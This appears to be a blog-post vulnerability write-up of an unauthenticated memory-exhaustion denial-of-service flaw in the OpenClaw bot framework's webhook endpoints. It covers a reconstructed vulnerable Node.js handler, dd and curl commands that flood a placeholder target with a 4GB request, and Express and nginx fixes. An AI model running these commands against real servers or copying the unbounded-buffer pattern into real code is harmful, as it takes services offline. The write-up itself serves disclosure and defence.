Feb 18, 2026 · 5 min read
OpenClaw listens for webhooks but doesn't check how big an incoming message is before buffering it into memory. An attacker can send a 5GB 'hello' message, causing the server to eat all available RAM and crash (OOM).
OpenClaw (formerly ClawdBot) suffers from a critical Denial of Service vulnerability due to improper handling of incoming webhook requests. The application buffers the entire request body into memory without enforcing size limits or checking the `Content-Length` header. This architectural oversight allows an unauthenticated attacker to send a single, massive HTTP request—potentially gigabytes in size—forcing the Node.js process to allocate memory until it hits the V8 heap limit or triggers the OS Out-Of-Memory (OOM) killer, crashing the service instantly.
In the rush to deploy AI agents that can talk to Telegram, Slack, and Discord simultaneously, developers often forget the cardinal rule of web services: Never trust the client.
OpenClaw (previously ClawdBot, currently Moltbot) is a popular framework for spinning up these omni-channel bots. To function, it exposes public webhook endpoints. These endpoints are the ears of the bot, waiting for a ping from Telegram saying, "Hey, user X just sent a message."
But here's the catch: To be useful, these endpoints must be publicly accessible to the internet. You can't firewall them off if you want Telegram to reach you. This exposes the application's intake mechanism to the entire world. And in OpenClaw's case, the intake mechanism had the appetite of a black hole and the stomach capacity of a thimble.
The vulnerability (GHSA-q447-rj3r-2cgh) is a textbook case of Uncontrolled Resource Consumption (CWE-400). In a healthy web application, when a request comes in, the server checks the Content-Length header. If someone tries to upload a terabyte of data to a text-only endpoint, the server should laugh and sever the connection immediately (HTTP 413 Payload Too Large).
OpenClaw didn't do this. Instead, it adopted what I like to call the "Slurp and Burp" strategy.
When a request arrived at the media or webhook endpoints, the application logic instructed the Node.js process to start buffering the incoming data stream into RAM. It didn't ask "how big is this?" It just started eating.
Complicating matters, the advisory indicates the application was performing Base64 decoding on media payloads in memory. Base64 encoding adds roughly 33% overhead to binary data. So, if an attacker sends a large payload, the server isn't just storing the payload; it's allocating new buffers to decode it, effectively doubling down on memory usage until the V8 garbage collector waves a white flag.
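The amplification is easy to demonstrate (illustrative sizes, not OpenClaw's code): base64-encoding binary data inflates it by roughly 4/3, and decoding allocates a second, separate buffer alongside the encoded string:

```javascript
const raw = Buffer.alloc(3 * 1024 * 1024);      // 3 MB of binary "media"
const encoded = raw.toString('base64');          // ~4 MB string, also held in RAM
const decoded = Buffer.from(encoded, 'base64');  // another 3 MB allocation

console.log(encoded.length / raw.length); // ≈ 1.333 (the 4/3 overhead)
```

For a moment all three copies coexist on the heap: the attacker pays for one upload, the server pays roughly three times over.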
While the exact vulnerable source isn't public, we can reconstruct the flaw from the patch analysis. The vulnerable pattern in Node.js typically looks like this:
```javascript
// THE VULNERABLE WAY
app.post('/api/webhooks/telegram', (req, res) => {
  let data = [];
  // 1. Event listener fires for every chunk of data received
  req.on('data', (chunk) => {
    // 2. BLINDLY push chunks to memory.
    // No check for if (data.length > MAX_LIMIT)
    data.push(chunk);
  });
  req.on('end', () => {
    // 3. Concatenate and explode
    const buffer = Buffer.concat(data);
    processWebhook(buffer);
  });
});
```

This code is a death sentence in production. Node.js streams are powerful because they allow processing data as it flows. By manually collecting chunks into an array without a limiter, the developer turned a streaming platform into a bucket.
If you send a 10GB stream, the process dies with a fatal `HEAP_OUT_OF_MEMORY` error.

Exploiting this does not require advanced reverse engineering, shellcode, or complex gadget chains. It requires `curl` and a large file. This is the script-kiddie equivalent of a nuclear option.
First, we generate a massive garbage file. We don't even need real JSON; we just need bytes to fill the pipe.
```bash
# Generate a 4GB file of zeros
dd if=/dev/zero of=death_packet.bin bs=1G count=4
```

Next, we direct this firehose at the target. Since OpenClaw is listening for webhooks, we target the `/api/webhooks/generic` or `/api/webhooks/telegram` endpoint.
```bash
curl -v -X POST http://target-openclaw:3000/api/webhooks/telegram \
  -H "Content-Type: application/json" \
  --data-binary @death_packet.bin
```

The server-side view:
```
Out of memory: Killed process 123 (node).
```

The fix for this is two-fold: application-level constraints and infrastructure-level gating. You never want your application to be the first line of defense against a volumetric attack, but it shouldn't be defenseless either.
1. The Code Fix (Application Level)
The patched version (2026.1.24-4) implements body size limits. If you are using `body-parser` or similar middleware in Express/Node, it looks like this:

```javascript
// THE FIX
app.use(express.json({ limit: '10mb' }));
app.use(express.urlencoded({ limit: '10mb', extended: true }));
```

For raw streams, you must check the chunk length as it arrives and destroy the socket if it exceeds your tolerance.
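That streaming guard can be sketched as a small helper (the `collectWithLimit` name and limit are illustrative, not OpenClaw's actual API): byte-count each chunk as it arrives and destroy the stream the moment the cap is crossed, instead of buffering first and checking later.

```javascript
// Collect a stream into memory, aborting once maxBytes is exceeded.
function collectWithLimit(stream, maxBytes) {
  return new Promise((resolve, reject) => {
    const chunks = [];
    let received = 0;

    stream.on('data', (chunk) => {
      received += chunk.length;
      if (received > maxBytes) {
        stream.destroy(); // stop reading; partial buffers become GC-able
        reject(new Error('Payload Too Large'));
        return;
      }
      chunks.push(chunk);
    });

    stream.on('end', () => resolve(Buffer.concat(chunks)));
    stream.on('error', reject);
  });
}

// In a handler: collectWithLimit(req, 10 * 1024 * 1024)
//   .then(processWebhook)
//   .catch(() => { res.writeHead(413); res.end(); });
```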
2. The Infrastructure Fix (The Real Shield)
Do not expose Node.js directly to the internet. Put Nginx, HAProxy, or a Cloud WAF in front of it. Nginx is incredibly efficient at dropping oversized requests before they ever touch your expensive application memory.
```nginx
# nginx.conf
server {
    ...
    # Drop anything larger than 10MB
    client_max_body_size 10M;
    ...
}
```

This turns a 5GB crash attempt into a harmless `413 Request Entity Too Large` error log.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| clawdbot OpenClaw | <= 2026.1.24-3 | 2026.1.24-4 |
| Attribute | Detail |
|---|---|
| Vulnerability ID | GHSA-q447-rj3r-2cgh |
| CWE | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Unauthenticated) |
| Impact | Denial of Service (DoS) |
| Fix Version | 2026.1.24-4 |
The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.